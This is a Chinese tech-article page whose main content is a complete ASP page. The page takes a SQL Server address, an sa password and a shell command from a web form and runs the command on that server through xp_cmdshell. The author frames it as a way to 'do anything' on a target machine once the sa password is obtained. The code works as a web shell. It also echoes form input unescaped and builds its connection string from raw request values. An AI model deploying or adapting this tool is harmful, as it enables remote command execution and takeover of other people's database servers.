• 丰搜首页
• 文档中心
• 视频中心
• 丰搜贴吧
• 问题集锦
• 更多功能

选择显示字体大小

• 最大
• 较大
• 标准

sqlserver扩展存储过程xp_cmdshell的简单应用

    xp_cmdshell存储过程是执行本机的cmd命令，要求系统登陆有sa权限，也就是说如果获得sqlserver的sa命令，那就可以在目标机为所欲为了，知名软件“流光”使用的应该也是这个存储过程来实现在目标机上的操作。
下面是我写的一个简单的应用页面(asp)，代码如下。
cmd.asp
<%@language="vbscript" codepage="936"%>
<!doctype html public "-//w3c//dtd html 4.01 transitional//en" "http://www.w3.org/tr/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<title>sqlserver_xp_cmdshell实例_魔术师·刘</title>
<style type="text/css">
<!--
body{
 font-size:13px;
 line-height:20px;
 width:760;
 scrollbar-face-color: #2896e1;
 scrollbar-shadow-color: #6cb4d8;
 scrollbar-arrow-color: #f0f0f0;
 scrollbar-darkshadow-color: #2896e1;
 scrollbar-base-color: #2896e1;
 background-image: url(images/bg.gif);
}
.lbr{
border-top:0px solid #336699;
border-left:1px solid #336699;
border-right:1px solid #336699;
border-bottom:1px solid #336699;
}
.all_h {
 border: 1px solid #336699;
}
.input {
 border: 1px solid #336699;
 background-color:#eceafd;
}
.lb{
border-top:0px solid #336699;
border-left:1px solid #336699;
border-right:0px solid #336699;
border-bottom:1px solid #336699;
}
.n1 {font-weight:bold;color:#339933;font-size:13px;}
.n2 {font-weight:bold;color:#ff0000;font-size:13px;}
-->
</style>
</head>

<body>

<%if request("cmd")<>"" then%>
<table width=400  border=0 align=center cellpadding=5 cellspacing=0>
  <tr align=center>
    <td height=30  class=all_h bgcolor=#b3e0ff ><span class=n1>xp_cmdshell请求结果</span></td>
  </tr>
  <%

dim connstr,conn,rs,i
connstr="provider=sqloledb.1;persist security info=false;server="&request("server")&";uid=sa;pwd="&request("pwd")&";database=master"
'connstr="provider=sqloledb.1;persist security info=false;server=(local);uid=sa;pwd=www.zhi.net;database=master"
set conn=server.createobject("adodb.connection")
conn.open connstr
set rs=server.createobject("adodb.recordset")
set rs=conn.execute("xp_cmdshell '"&replace(replace(request("cmd"),"'","''"),chr(34),"''")&"'")
i=0
while not rs.eof
if not isnull(rs(0)) then
if i mod 2 =0 then
response.write "<tr><td class=""lbr"" bgcolor=""#def3ff"">"&rs(0)&"</td></tr>"
else
response.write "<tr><td class=""lbr"">"&rs(0)&"</td></tr>"
end if
i=i+1
end if
rs.movenext
wend
rs.close
set rs=nothing
conn.close
set conn=nothing
%>
</table>
<%end if%>
<form name="form1" method="post" action="">
  <table width=400  border=0 align=center cellpadding=5 cellspacing=0>
    <tr align=center>
      <td height=30 colspan=2  class=all_h bgcolor=#b3e0ff ><span class=n1>xp_cmdshell实例</span></td>
    </tr>
    <tr align=center bgcolor=#def3ff>
      <td width=26% class=lb><strong>服务器</strong></td>
      <td width=74% class=lbr><div align="left">
          <input name="server" type="text" id="server" class="input" size="20" value="<%=request("server")%>">
      </div></td>
    </tr>
    <tr align=center >
      <td   class=lb><b>sa密码 </b></td>
      <td   class=lbr><div align="left"><span class=n1>
          <input name="pwd" type="text" id="pwd" class="input" size="20" value="<%=request("pwd")%>">
      </span></div></td>
    </tr>
    <tr align=center bgcolor=#def3ff>
      <td width=26% class=lb><strong>cmd命令</strong></td>
      <td width=74% class=lbr><div align="left">
          <input name="cmd" type="text" id="cmd" class="input" size="20" value="<%=request("cmd")%>">
      </div></td>
    </tr>
    <tr align=center >
      <td colspan="2"   class=lbr><div align="center"><b> </b>
              <input type="submit" name="submit" value="  提交command命令  " class="input">
      </div></td>
    </tr>
  </table>
</form>
</body>
</html>

关键字 本文所属关键字

相关 与本文相关文章

分类 所有文章关键字导航

源码编程相关

Java   Asp   PHP   .Net   XML   C/C++   CGI   VB   Jsp   J2ee   J2se   J2me   EJB   Servlet   Tomcat   Resin   Struts   Weblogic   Eclipse   ANT   GUI   JMS   Web servise   IDEA   Webphere   Hibernate   Spring   Jboss   Applet   Swing   Socket   Javamail   Perl   Ajax   P2P   安全   模式   框架   测试   开源   游戏

SQL数据库相关

My-SQL   Ms-SQL   Access   DB2   Oracle   Sybase   SQLserver   索引   存储过程   加密   数据库   分页   视图  

手机无线相关

3G   Wap   CDMA   GRPS   GSM   IVR   彩信   短信   无线   增值业务

网页设计制作相关

HTML   CSS   网页配色   网页特效   Javascript   VBscript   Dreamweaver   Frontpage   JS   Web   网站设计

网站建设推广相关

建站经验   网站优化   网站排名   推广   Alexa

操作系统/服务器相关

Windows XP   Windows 2000   Windows 2003   Windows Me   Windows 9.x   Linux   UNIX   注册表   操作系统   服务器   应用服务器

图形图像多媒体相关

Photoshop   Fireworks   Flash   Coreldraw   Illustrator   Freehand   Photoimpact   多媒体   图形图像

标准 网站致力的规范